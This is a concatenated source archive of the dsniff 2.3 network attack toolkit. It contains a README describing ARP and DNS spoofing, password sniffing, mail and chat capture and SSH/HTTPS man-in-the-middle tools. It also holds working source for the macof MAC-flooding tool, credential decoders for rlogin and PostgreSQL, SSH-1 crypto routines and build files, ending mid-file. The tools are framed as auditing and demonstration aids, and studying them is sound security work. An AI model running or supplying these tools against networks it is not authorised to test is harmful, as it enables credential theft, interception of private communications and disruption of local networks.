hackerschoice-dsniff-a17510d/README0000664000175000017500000000755415105626144016705 0ustar epsilonepsilon dsniff-2.3 ---------- i wrote these tools with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext / weakly-encrypted network protocols and ad-hoc PKI. please do not abuse this software. these programs require: Berkeley DB - http://www.sleepycat.com/ OpenSSL - http://www.openssl.org/ libpcap - http://www.tcpdump.org/ libnids - http://www.packetfactory.net/Projects/Libnids/ libnet - http://www.packetfactory.net/Projects/Libnet/ built and tested on OpenBSD, Linux, and Solaris. YMMV. what's here: arpspoof redirect packets from a target host (or all hosts) on the LAN intended for another local host by forging ARP replies. this is an extremely effective way of sniffing traffic on a switch. kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter :-) must be turned on ahead of time. dnsspoof forge replies to arbitrary DNS address / pointer queries on the LAN. this is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks (HTTP, HTTPS, SSH, Kerberos, etc). dsniff password sniffer. handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well). filesnarf saves selected files sniffed from NFS traffic in the current working directory. macof flood the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). a straight C port of the original Perl Net::RawIP macof program. mailsnarf a fast and easy way to violate the Electronic Communications Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs selected messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail -f, pine, etc.). msgsnarf record selected messages from sniffed AOL Instant Messenger, ICQ 2000, IRC, and Yahoo! Messenger chat sessions. sshmitm SSH monkey-in-the-middle. proxies and sniffs SSH traffic redirected by dnsspoof(8), capturing SSH password logins, and optionally hijacking interactive sessions. only SSH protocol version 1 is (or ever will be) supported - this program is far too evil already. sshow SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2 traffic, identifying authentication attempts, the lengths of passwords entered in interactive sessions, and command line lengths. tcpkill kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). tcpnice slow down specified TCP connections via "active" traffic shaping. forges tiny TCP window advertisements, and optionally ICMP source quench replies. urlsnarf output selected URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.). webmitm HTTP / HTTPS monkey-in-the-middle. transparently proxies and sniffs web traffic redirected by dnsspoof(8), capturing most "secure" SSL-encrypted webmail logins and form submissions. webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). a fun party trick. :-) -d. --- http://www.monkey.org/~dugsong/ hackerschoice-dsniff-a17510d/macof.c0000664000175000017500000000640215105626144017245 0ustar epsilonepsilon/* * macof.c * * C port of macof-1.1 from the Perl Net::RawIP distribution. * Tests network devices by flooding local network with MAC-addresses. * * Perl macof originally written by Ian Vitek . * * Copyright (c) 1999 Dug Song * * $Id: macof.c,v 1.15 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include extern char *ether_ntoa(struct ether_addr *); extern struct ether_addr *ether_aton(char *); in_addr_t Src = 0; in_addr_t Dst = 0; u_char *Tha = NULL; u_short Dport = 0; u_short Sport = 0; char *Intf = NULL; int Repeat = -1; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]" "\n [-i interface] [-n times]\n"); exit(1); } static void gen_mac(u_char *mac) { *((in_addr_t *)mac) = libnet_get_prand(LIBNET_PRu32); *((u_short *)(mac + 4)) = libnet_get_prand(LIBNET_PRu16); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, i; struct libnet_link_int *llif; char pcap_ebuf[PCAP_ERRBUF_SIZE]; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; in_addr_t src, dst; u_short sport, dport; u_int32_t seq; libnet_t *l; while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { switch (c) { case 'v': break; case 's': Src = libnet_name2addr4(l, optarg, 0); break; case 'd': Dst = libnet_name2addr4(l, optarg, 0); break; case 'e': Tha = (u_char *)ether_aton(optarg); break; case 'x': Sport = atoi(optarg); break; case 'y': Dport = atoi(optarg); break; case 'i': Intf = optarg; break; case 'n': Repeat = atoi(optarg); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 0) usage(); if (!Intf && (Intf = pcap_lookupdev(pcap_ebuf)) == NULL) errx(1, "%s", pcap_ebuf); if ((l = libnet_init(LIBNET_LINK, Intf, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); libnet_seed_prand(l); for (i = 0; i != Repeat; i++) { gen_mac(sha); if (Tha == NULL) gen_mac(tha); else memcpy(tha, Tha, sizeof(tha)); if (Src != 0) src = Src; else src = libnet_get_prand(LIBNET_PRu32); if (Dst != 0) dst = Dst; else dst = libnet_get_prand(LIBNET_PRu32); if (Sport != 0) sport = Sport; else sport = libnet_get_prand(LIBNET_PRu16); if (Dport != 0) dport = Dport; else dport = libnet_get_prand(LIBNET_PRu16); seq = libnet_get_prand(LIBNET_PRu32); libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0); libnet_build_ipv4(LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0); libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, l, 0); if (libnet_write(l) < 0) errx(1, "write"); libnet_clear_packet(l); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", ether_ntoa((struct ether_addr *)tha), libnet_addr2name4(Src, 0), sport, libnet_addr2name4(Dst, 0), dport, seq, seq); } exit(0); } hackerschoice-dsniff-a17510d/decode_rlogin.c0000664000175000017500000000212315105626144020751 0ustar epsilonepsilon/* * decode_rlogin.c * * Berkeley remote login/shell/exec. * * Copyright (c) 2000 Dug Song * * $Id: decode_rlogin.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "options.h" #include "decode.h" int decode_rlogin(u_char *buf, int len, u_char *obuf, int olen) { u_char *p, *q; /* Skip first NULL, or rexec stderr port */ for (p = buf; p - buf < len && *p == '\0'; p++) ; /* VOID */ strlcpy(obuf, "[", olen); strlcat(obuf, p, olen); /* Local username */ strlcat(obuf, ":", olen); p += strlen(p) + 1; strlcat(obuf, p, olen); /* Remote username */ strlcat(obuf, "]\n", olen); p += strlen(p) + 1; p += strlen(p) + 1; /* Skip term info */ if ((q = strstr(p, "\xff\xffss")) != NULL) /* Skip window size */ p += 12; for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { strlcat(obuf, p, olen); strlcat(obuf, "\n", olen); } if (!strip_lines(obuf, Opt_lines)) return (0); return (strlen(obuf)); } hackerschoice-dsniff-a17510d/nfs_prot.x0000664000175000017500000001641115105626144020040 0ustar epsilonepsilon/* minimal spec for filesnarf. */ /* * Copyright (c) 1987, 1997 by Sun Microsystems, Inc. * All rights reserved. */ /* #pragma ident "@(#)nfs_prot.x 1.5 97/06/21 SMI" */ %#include "config.h" const NFS_PORT = 2049; const NFS_MAXDATA = 8192; const NFS_MAXPATHLEN = 1024; const NFS_MAXNAMLEN = 255; const NFS_FHSIZE = 32; const NFS_COOKIESIZE = 4; const NFS_FIFO_DEV = -1; /* size kludge for named pipes */ /* * File types */ const NFSMODE_FMT = 0170000; /* type of file */ const NFSMODE_DIR = 0040000; /* directory */ const NFSMODE_CHR = 0020000; /* character special */ const NFSMODE_BLK = 0060000; /* block special */ const NFSMODE_REG = 0100000; /* regular */ const NFSMODE_LNK = 0120000; /* symbolic link */ const NFSMODE_SOCK = 0140000; /* socket */ const NFSMODE_FIFO = 0010000; /* fifo */ /* * Error status */ enum nfsstat { NFS_OK= 0, /* no error */ NFSERR_PERM=1, /* Not owner */ NFSERR_NOENT=2, /* No such file or directory */ NFSERR_IO=5, /* I/O error */ NFSERR_NXIO=6, /* No such device or address */ NFSERR_ACCES=13, /* Permission denied */ NFSERR_EXIST=17, /* File exists */ NFSERR_XDEV=18, /* Cross-device link */ NFSERR_NODEV=19, /* No such device */ NFSERR_NOTDIR=20, /* Not a directory*/ NFSERR_ISDIR=21, /* Is a directory */ NFSERR_INVAL=22, /* Invalid argument */ NFSERR_FBIG=27, /* File too large */ NFSERR_NOSPC=28, /* No space left on device */ NFSERR_ROFS=30, /* Read-only file system */ NFSERR_OPNOTSUPP=45, /* Operation not supported */ NFSERR_NAMETOOLONG=63, /* File name too long */ NFSERR_NOTEMPTY=66, /* Directory not empty */ NFSERR_DQUOT=69, /* Disc quota exceeded */ NFSERR_STALE=70, /* Stale NFS file handle */ NFSERR_REMOTE=71, /* Object is remote */ NFSERR_WFLUSH=72 /* write cache flushed */ }; /* * File types */ enum ftype { NFNON = 0, /* non-file */ NFREG = 1, /* regular file */ NFDIR = 2, /* directory */ NFBLK = 3, /* block special */ NFCHR = 4, /* character special */ NFLNK = 5, /* symbolic link */ NFSOCK = 6, /* unix domain sockets */ NFBAD = 7, /* unused */ NFFIFO = 8 /* named pipe */ }; /* * File access handle */ struct nfs_fh { opaque data[NFS_FHSIZE]; }; /* * Timeval */ struct nfstime { unsigned seconds; unsigned useconds; }; /* * File attributes */ struct fattr { ftype type; /* file type */ unsigned mode; /* protection mode bits */ unsigned nlink; /* # hard links */ unsigned uid; /* owner user id */ unsigned gid; /* owner group id */ unsigned size; /* file size in bytes */ unsigned blocksize; /* prefered block size */ unsigned rdev; /* special device # */ unsigned blocks; /* Kb of disk used by file */ unsigned fsid; /* device # */ unsigned fileid; /* inode # */ nfstime atime; /* time of last access */ nfstime mtime; /* time of last modification */ nfstime ctime; /* time of last change */ }; typedef string filename; typedef string nfspath; /* * Arguments for directory operations */ struct diropargs { nfs_fh dir; /* directory file handle */ filename name; /* name (up to NFS_MAXNAMLEN bytes) */ }; struct diropokres { nfs_fh file; fattr attributes; }; /* * Results from directory operation */ union diropres switch (nfsstat status) { case NFS_OK: diropokres diropres; default: void; }; /* * Arguments to remote read */ struct readargs { nfs_fh file; /* handle for file */ unsigned offset; /* byte offset in file */ unsigned count; /* immediate read count */ unsigned totalcount; /* total read count (from this offset)*/ }; /* * Status OK portion of remote read reply */ struct readokres { fattr attributes; /* attributes, need for pagin*/ opaque data; }; union readres switch (nfsstat status) { case NFS_OK: readokres reply; default: void; }; /* * Remote file service routines */ program NFS_PROGRAM { version NFS_VERSION { void NFSPROC_NULL(void) = 0; diropres NFSPROC_LOOKUP(diropargs) = 4; readres NFSPROC_READ(readargs) = 6; } = 2; } = 100003; /* * Version 3 declarations and definitions. */ /* * Sizes */ const NFS3_FHSIZE = 64; const NFS3_COOKIEVERFSIZE = 8; const NFS3_CREATEVERFSIZE = 8; const NFS3_WRITEVERFSIZE = 8; /* * Basic data types */ typedef uint64_t uint64; typedef int64_t int64; typedef unsigned int uint32; typedef int int32; typedef string filename3<>; typedef string nfspath3<>; typedef uint64 fileid3; typedef uint64 cookie3; typedef opaque cookieverf3[NFS3_COOKIEVERFSIZE]; typedef opaque createverf3[NFS3_CREATEVERFSIZE]; typedef opaque writeverf3[NFS3_WRITEVERFSIZE]; typedef uint32 uid3; typedef uint32 gid3; typedef uint64 size3; typedef uint64 offset3; typedef uint32 mode3; typedef uint32 count3; /* * Error status */ enum nfsstat3 { NFS3_OK = 0, NFS3ERR_PERM = 1, NFS3ERR_NOENT = 2, NFS3ERR_IO = 5, NFS3ERR_NXIO = 6, NFS3ERR_ACCES = 13, NFS3ERR_EXIST = 17, NFS3ERR_XDEV = 18, NFS3ERR_NODEV = 19, NFS3ERR_NOTDIR = 20, NFS3ERR_ISDIR = 21, NFS3ERR_INVAL = 22, NFS3ERR_FBIG = 27, NFS3ERR_NOSPC = 28, NFS3ERR_ROFS = 30, NFS3ERR_MLINK = 31, NFS3ERR_NAMETOOLONG = 63, NFS3ERR_NOTEMPTY = 66, NFS3ERR_DQUOT = 69, NFS3ERR_STALE = 70, NFS3ERR_REMOTE = 71, NFS3ERR_BADHANDLE = 10001, NFS3ERR_NOT_SYNC = 10002, NFS3ERR_BAD_COOKIE = 10003, NFS3ERR_NOTSUPP = 10004, NFS3ERR_TOOSMALL = 10005, NFS3ERR_SERVERFAULT = 10006, NFS3ERR_BADTYPE = 10007, NFS3ERR_JUKEBOX = 10008 }; /* * File types */ enum ftype3 { NF3REG = 1, NF3DIR = 2, NF3BLK = 3, NF3CHR = 4, NF3LNK = 5, NF3SOCK = 6, NF3FIFO = 7 }; struct specdata3 { uint32 specdata1; uint32 specdata2; }; /* * File access handle */ struct nfs_fh3 { opaque data; }; /* * Timeval */ struct nfstime3 { uint32 seconds; uint32 nseconds; }; /* * File attributes */ struct fattr3 { ftype3 type; mode3 mode; uint32 nlink; uid3 uid; gid3 gid; size3 size; size3 used; specdata3 rdev; uint64 fsid; fileid3 fileid; nfstime3 atime; nfstime3 mtime; nfstime3 ctime; }; /* * File attributes */ union post_op_attr switch (bool attributes_follow) { case TRUE: fattr3 attributes; case FALSE: void; }; struct wcc_attr { size3 size; nfstime3 mtime; nfstime3 ctime; }; union pre_op_attr switch (bool attributes_follow) { case TRUE: wcc_attr attributes; case FALSE: void; }; struct wcc_data { pre_op_attr before; post_op_attr after; }; struct diropargs3 { nfs_fh3 dir; filename3 name; }; /* * LOOKUP: Lookup filename */ struct LOOKUP3args { diropargs3 what; }; struct LOOKUP3resok { nfs_fh3 object; post_op_attr obj_attributes; post_op_attr dir_attributes; }; struct LOOKUP3resfail { post_op_attr dir_attributes; }; union LOOKUP3res switch (nfsstat3 status) { case NFS3_OK: LOOKUP3resok resok; default: LOOKUP3resfail resfail; }; /* * READ: Read from file */ struct READ3args { nfs_fh3 file; offset3 offset; count3 count; }; struct READ3resok { post_op_attr file_attributes; count3 count; bool eof; opaque data<>; }; struct READ3resfail { post_op_attr file_attributes; }; union READ3res switch (nfsstat status) { case NFS3_OK: READ3resok resok; default: READ3resfail resfail; }; /* * Remote file service routines */ program NFS3_PROGRAM { version NFS_V3 { void NFSPROC3_NULL(void) = 0; LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args) = 3; READ3res NFSPROC3_READ(READ3args) = 6; } = 3; } = 100003; hackerschoice-dsniff-a17510d/dsniff.magic0000664000175000017500000000432415105626144020270 0ustar epsilonepsilon# $Id: dsniff.magic,v 1.8 2000/07/19 03:22:02 dugsong Exp $ # # Network protocol magic(5) for dsniff. # #0 string FLAPON aim 0 string BEGIN\ cvs 0 string SYST ftp 0 string USER\ ftp ftp 0 string USER\ anonymous ftp 0 string HELO\ smtp 0 string EHLO\ smtp 0 string GET\ / http 0 string POST\ / http 0 string CONNECT\ http 1 string \ ID\ imap 2 string \ ID\ imap 3 string \ ID\ imap 4 string \ ID\ imap 5 string \ ID\ imap 1 string \ LOGIN\ imap 2 string \ LOGIN\ imap 3 string \ LOGIN\ imap 4 string \ LOGIN\ imap 5 string \ LOGIN\ imap 1 string \ AUTHENTICATE\ PLAIN\ imap 2 string \ AUTHENTICATE\ PLAIN\ imap 3 string \ AUTHENTICATE\ PLAIN\ imap 4 string \ AUTHENTICATE\ PLAIN\ imap 5 string \ AUTHENTICATE\ PLAIN\ imap 0 string NICK\ irc 0 string USER\ pop 0 string AUTH\ pop 12 string MIT-MAGIC x11 0 string LIST nntp 0 string GROUP nntp 0 string NEW nntp 0 string ARTICLE nntp 0 belong 0x7f7f4943 >4 beshort 0x4100 citrix #0 belong 0x0200e803 icq 0 beshort 0x1603 >2 byte 0x01 >>5 byte 0x01 >>>9 byte 0x03 https 8 belong 0x0135012c >12 belong 0x0c010800 >>16 belong 0x7fff7f08 >>>20 belong 0x00000001 oracle 0 belong 0x0 >4 byte 0x8d pcanywhere >5 byte 0x6 pcanywhere 132 belong 0x0301060a >242 belong 0 tds 32 belong 0xe0031000 >36 belong 0x2c010000 tds 12 belong 100000 >4 belong 0 >>8 belong 2 portmap 12 belong 100005 >4 belong 0 >>8 belong 2 mountd 12 belong 100009 >4 belong 0 >>8 belong 2 yppasswd 16 belong 100000 >8 belong 0 >>12 belong 2 portmap 16 belong 100005 >8 belong 0 >>12 belong 2 mountd 16 belong 100009 >8 belong 0 >>12 belong 2 yppasswd 0 belong 296 >4 belong 0x20000 postgresql 0 belong 0x81000048 >33 string CACA smb 0 beshort >0xfff9 >2 byte <40 >>3 beshort >0xfff9 >>>5 byte <40 telnet 0 string SSH- ssh #2 leshort 2 #>(0.b+6) leshort 208 napster #>(0.b+6) leshort 2 napster 0 byte 0x38 >8 belong 0x00002455 mmxp 0 byte 5 >6 leshort 260 >>32 byte 0 sniffer >6 leshort 261 >>32 lelong -1 sniffer >1 belong 0 >>5 byte 0 icq >(1.b+1) byte 1 socks 0 byte&0x1f 16 >2 byte&0x1f 2 >>5 byte 0x60 ldap >4 byte&0x1f 2 >>5 beshort&0xfffc 0x0100 >>>7 byte&0x1f 4 snmp hackerschoice-dsniff-a17510d/decode_postgresql.c0000664000175000017500000000205115105626144021662 0ustar epsilonepsilon/* * decode_postgresql.c * * PostgreSQL. * * Thanks to Eric Jackson for packet traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_postgresql.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" #define STARTUP_PKTLEN 296 int decode_postgresql(u_char *buf, int len, u_char *obuf, int olen) { u_int32_t plen; u_char *p; char *db, *user; if (len < STARTUP_PKTLEN) return (0); obuf[0] = '\0'; db = user = NULL; for (;;) { if (len < 4) break; plen = pntohl(buf); if (plen > len) break; p = buf + 4; if (plen == STARTUP_PKTLEN) { if (pntohl(p) >> 16 == 2) { db = p + 4; db[63] = '\0'; user = db + 64; user[31] = '\0'; } } else if (db != NULL && user != NULL) { buf[plen - 1] = '\0'; snprintf(obuf + strlen(obuf), olen - strlen(obuf), "%s\n%s\n%s\n", db, user, p); db = user = NULL; } buf += plen; len -= plen; } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/sshcrypto.h0000664000175000017500000000154515105626144020226 0ustar epsilonepsilon/* * sshcrypto.c * * SSH-1 crypto routines, adapted from OpenSSH. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Niels Provos * Copyright (c) 2000 Markus Friedl * * $Id: sshcrypto.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef SSHCRYPTO_H #define SSHCRYPTO_H void rsa_public_encrypt(BIGNUM *src, BIGNUM *dst, RSA *key); void rsa_private_decrypt(BIGNUM *src, BIGNUM *dst, RSA *key); void *blowfish_init(u_char *sesskey, int len); void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state); void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state); void *des3_init(u_char *sesskey, int len); void des3_encrypt(u_char *src, u_char *dst, int len, void *state); void des3_decrypt(u_char *src, u_char *dst, int len, void *state); #endif /* SSHCRYPTO_H */ hackerschoice-dsniff-a17510d/sshcrypto.c0000664000175000017500000001047215105626144020220 0ustar epsilonepsilon/* * sshcrypto.c * * SSH-1 crypto routines, adapted from OpenSSH. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Niels Provos * Copyright (c) 2000 Markus Friedl * * $Id: sshcrypto.c,v 1.5 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "sshcrypto.h" struct blowfish_state { struct bf_key_st key; u_char iv[8]; }; #if 0 struct des3_state { DES_key_schedule k1, k2, k3; DES_cblock iv1, iv2, iv3; }; #endif void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int len, ilen, olen; const BIGNUM *n, *e; RSA_get0_key(key, &n, &e, NULL); if (BN_num_bits(e) < 2 || !BN_is_odd(e)) errx(1, "rsa_public_encrypt() exponent too small or not odd"); olen = BN_num_bytes(n); outbuf = malloc(olen); ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (outbuf == NULL || inbuf == NULL) err(1, "malloc"); BN_bn2bin(in, inbuf); if ((len = RSA_public_encrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING)) <= 0) errx(1, "rsa_public_encrypt() failed"); BN_bin2bn(outbuf, len, out); memset(outbuf, 0, olen); memset(inbuf, 0, ilen); free(outbuf); free(inbuf); } void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int len, ilen, olen; const BIGNUM *n; RSA_get0_key(key, &n, NULL, NULL); olen = BN_num_bytes(n); outbuf = malloc(olen); ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (outbuf == NULL || inbuf == NULL) err(1, "malloc"); BN_bn2bin(in, inbuf); if ((len = RSA_private_decrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING)) <= 0) errx(1, "rsa_private_decrypt() failed"); BN_bin2bn(outbuf, len, out); memset(outbuf, 0, olen); memset(inbuf, 0, ilen); free(outbuf); free(inbuf); } /* XXX - SSH1's weirdo Blowfish... */ static void swap_bytes(const u_char *src, u_char *dst, int n) { char c[4]; for (n = n / 4; n > 0; n--) { c[3] = *src++; c[2] = *src++; c[1] = *src++; c[0] = *src++; *dst++ = c[0]; *dst++ = c[1]; *dst++ = c[2]; *dst++ = c[3]; } } void * blowfish_init(u_char *sesskey, int len) { struct blowfish_state *state; if ((state = malloc(sizeof(*state))) == NULL) err(1, "malloc"); BF_set_key(&state->key, len, sesskey); memset(state->iv, 0, 8); return (state); } void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state) { struct blowfish_state *estate; estate = (struct blowfish_state *)state; swap_bytes(src, dst, len); BF_cbc_encrypt((void *)dst, dst, len, &estate->key, estate->iv, BF_ENCRYPT); swap_bytes(dst, dst, len); } void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state) { struct blowfish_state *dstate; dstate = (struct blowfish_state *)state; swap_bytes(src, dst, len); BF_cbc_encrypt((void *)dst, dst, len, &dstate->key, dstate->iv, BF_DECRYPT); swap_bytes(dst, dst, len); } #if 0 /* XXX - SSH1's weirdo 3DES... */ void * des3_init(u_char *sesskey, int len) { struct des3_state *state; if ((state = malloc(sizeof(*state))) == NULL) err(1, "malloc"); DES_set_key((void *)sesskey, &state->k1); DES_set_key((void *)(sesskey + 8), &state->k2); if (len <= 16) DES_set_key((void *)sesskey, &state->k3); else DES_set_key((void *)(sesskey + 16), &state->k3); memset(state->iv1, 0, 8); memset(state->iv2, 0, 8); memset(state->iv3, 0, 8); return (state); } void des3_encrypt(u_char *src, u_char *dst, int len, void *state) { struct des3_state *estate; estate = (struct des3_state *)state; memcpy(estate->iv1, estate->iv2, 8); DES_ncbc_encrypt(src, dst, len, &estate->k1, &estate->iv1, DES_ENCRYPT); DES_ncbc_encrypt(dst, dst, len, &estate->k2, &estate->iv2, DES_DECRYPT); DES_ncbc_encrypt(dst, dst, len, &estate->k3, &estate->iv3, DES_ENCRYPT); } void des3_decrypt(u_char *src, u_char *dst, int len, void *state) { struct des3_state *dstate; dstate = (struct des3_state *)state; memcpy(dstate->iv1, dstate->iv2, 8); DES_ncbc_encrypt(src, dst, len, &dstate->k3, &dstate->iv3, DES_DECRYPT); DES_ncbc_encrypt(dst, dst, len, &dstate->k2, &dstate->iv2, DES_ENCRYPT); DES_ncbc_encrypt(dst, dst, len, &dstate->k1, &dstate->iv1, DES_DECRYPT); } #endif hackerschoice-dsniff-a17510d/msgsnarf.80000664000175000017500000000152515105626144017726 0ustar epsilonepsilon.TH MSGSNARF 8 .ad .fi .SH NAME msgsnarf \- sniff chat messages .SH SYNOPSIS .na .nf .fi \fBmsgsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBmsgsnarf\fR records selected messages from AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat sessions. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching messages. .IP \fIpattern\fR Specify regular expression for message matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/configure.ac0000775000175000017500000002354115105626144020310 0ustar epsilonepsilondnl configure.in dnl dnl Copyright (c) 2000 Dug Song dnl dnl $Id: configure.in,v 1.27 2000/12/20 16:31:21 dugsong Exp $ AC_INIT AC_CONFIG_SRCDIR([dsniff.c]) AC_CONFIG_HEADERS([config.h]) dnl Initialize prefix. if test "$prefix" = "NONE"; then prefix="/usr/local" fi dnl Checks for programs. AC_PROG_CC AC_PROG_INSTALL AC_PROG_RANLIB dnl Checks for header files. AC_PATH_XTRA AC_CHECK_HEADERS(err.h fcntl.h sys/ioctl.h sys/queue.h unistd.h libgen.h net/if_tun.h) dnl XXX - Solaris sux. dnl Checks for typedefs, structures, and compiler characteristics. AC_C_CONST AC_TYPE_SIZE_T AC_STRUCT_TM dnl XXX - Solaris sux. AC_CHECK_TYPE(u_int32_t, uint32_t) AC_CHECK_TYPE(u_int64_t, uint64_t) dnl XXX - Linux sux. AC_CHECK_TYPE(in_addr_t, u_int32_t) CFLAGS="$CFLAGS -D_DEFAULT_SOURCE" dnl Checks for library functions. AC_PROG_GCC_TRADITIONAL AC_FUNC_MEMCMP AC_FUNC_STRFTIME AC_CHECK_FUNCS(gethostname socket strdup strstr) AC_CHECK_LIB(rpcsvc, xdr_fhstatus) AC_CHECK_LIB([tirpc], [clnt_tli_create], [X_TIRPC_LIB="-ltirpc"]) AC_SUBST(X_TIRPC_LIB) AC_CHECK_LIB([ibverbs], [ibv_close_device], [X_IBVERBS_LIB="-libverbs"]) AC_SUBST(X_IBVERBS_LIB) dnl XXX - Solaris sux. AC_CHECK_LIB(socket, socket) AC_CHECK_LIB(nsl, gethostbyname) dnl XXX - feh, everything except OpenBSD sux. AC_CHECK_LIB(resolv, dn_expand) AC_CHECK_LIB(resolv, __dn_expand) dnl We cant tell if the static libnids.a is build with glib2. Better add dnl it just in case. AC_CHECK_LIB(glib-2.0, g_mutex_init) AC_CHECK_LIB(gthread-2.0, g_thread_init) AC_REPLACE_FUNCS(dirname strlcpy strlcat strsep) needmd5=no AC_CHECK_FUNCS(MD5Update, , [needmd5=yes]) if test $needmd5 = yes; then LIBOBJS="$LIBOBJS md5.o" fi neederr=no AC_CHECK_FUNCS(warnx, , [neederr=yes]) if test $neederr = yes; then LIBOBJS="$LIBOBJS err.o" fi needethers=no AC_CHECK_FUNCS(ether_ntoa, , [needethers=yes]) if test $needethers = yes; then LIBOBJS="$LIBOBJS ethers.o" fi dnl Checks for BSD tunnel device dnl if test "x$ac_cv_header_net_if_tun_h" = "xyes"; then dnl TCPHIJACK="tcphijack" dnl fi AC_SUBST(TCPHIJACK) dnl Checks for X11 if test "x$no_x" = "x"; then WEBSPY="webspy"; AC_SUBST(WEBSPY) fi AC_MSG_CHECKING([whether to enable static build]) AC_ARG_ENABLE([static], [AS_HELP_STRING([--enable-static],[Compile static binary])], [enable_static="yes"; LDFLAGS_STATIC="-static"], [enable_static="no"]) AC_MSG_RESULT([$enable_static]) if test "x$enable_static" = "xyes"; then dnl -static requires to satisfy forward-dependencies AC_CHECK_LIB([intl], [libintl_gettext]) fi AC_MSG_CHECKING([whether to enable BerkelyDB]) AC_ARG_ENABLE([berkeleydb], [AS_HELP_STRING([--enable-berkeleydb],[Build with BerkeleyDB])], [BDB="yes"], [BDB="no"]) AC_MSG_RESULT([$BDB]) if test x"${BDB}" = "xyes"; then AC_DEFINE([WITH_BERKELEYDB], [1], [BLah]) fi if test x"${BDB}" = xyes; then dnl Checks for Berkeley DB AC_MSG_CHECKING(for Berkeley DB with 1.85 compatibility) AC_ARG_WITH(db, [ --with-db=DIR use Berkeley DB (with --enable-compat185) in DIR], [ case "$withval" in yes|no) AC_MSG_RESULT(no) ;; *) AC_MSG_RESULT($withval) if test -f $withval/build_unix/db_185.h -a \ -f $withval/build_unix/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/build_unix" DBLIB="-L$withval/build_unix -ldb" elif test -f $withval/dist/db_185.h -a \ -f $withval/dist/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/dist" DBLIB="-L$withval/dist -ldb" elif test -f $withval/include/db_185.h -a \ -f $withval/lib/libdb.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi AC_DEFINE(HAVE_DB_185_H) DBINC="-I$withval/include" DBLIB="-L$withval/lib -ldb" else AC_MSG_ERROR(db_185.h or libdb.a not found in $withval or not configured with --enable-compat185) fi ;; esac ], [ for dir in 